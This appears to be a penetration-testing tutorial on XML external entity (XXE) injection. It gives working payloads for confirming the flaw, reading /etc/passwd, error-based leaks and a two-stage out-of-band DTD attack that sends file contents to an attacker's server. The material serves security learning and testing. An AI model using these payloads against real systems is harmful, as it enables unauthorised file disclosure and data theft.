This section covers pwning XML parsers with XML external entities (XXE) injection attacks. We can use XXE injection attacks to uncover information disclosure, server-side request forgery (SSRF), remote command injection, and remote code execution vulnerabilities in web applications.
Testing for XXE
Here’s an example for testing for XXE in an XML parser for a web application. If
we’re providing the following input to a web application, and the internal
entity lastname
is used to render the output for the User
element, we know
we can inject XML entities for the application to process:
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Hacker">
]>
<User>
<lastName>&lastname;</lastName>
<firstName>Victim</firstName>
</User>
Retrieving files
After verifying the vulnerability, we can use it to conduct information disclosure, targeting content on the host’s file system:
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<User>
<lastName>&lastname;</lastName>
<firstName>Victim</firstName>
</User>
We determine where this content is rendered, and then we can retrieve the contents of the file from the web application.
Error-based exploitation
If the information we’re targeting isn’t rendered by the web application in a
way we can access after exploitation, we can use error-based exploitation to
possibly disclose the information we’re targeting. For example, lastname
might
have a maximum character length for the web application’s database used to store
User
s. If we request a file on the host system with a size that exceed this
limit, it’s likely the web application will provide us with an error, leaking
the contents of the file we’re targeting.
Out-of-band exploitation
We can also conduct SSRF, coercing the victim machine to attempt to load
external resources from our server, disclosing information when the victim
executes a GET
request. Here’s an example of a payload that causes the victim
to request our XML file and parse it, causing the victim to request a second
stage payload that discloses the information we’re targeting via a GET
request.
First stage payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://IP_ADDRESS/second-stage-payload.dtd">
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>
Second stage payload:
<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY % exfil SYSTEM 'http://IP_ADDRESS/out?%content;'>" >
The first payload will request the second stage payload, which will attempt to
acquire the contents of the /etc/passwd
file. Then the second stage payload
will attempt to acquire a resource from our web server, and we render the
content of the file in the URL
the victim is requesting. This SSRF attack
leaks the contents of the file when the GET
request reaches our web server.
Due to how URLs are parsed, it’s likely a portion of this request will fail. Unfortunately out-of-band exploitation for XXE vulnerabilities is a last resort, and not always the most effective approach.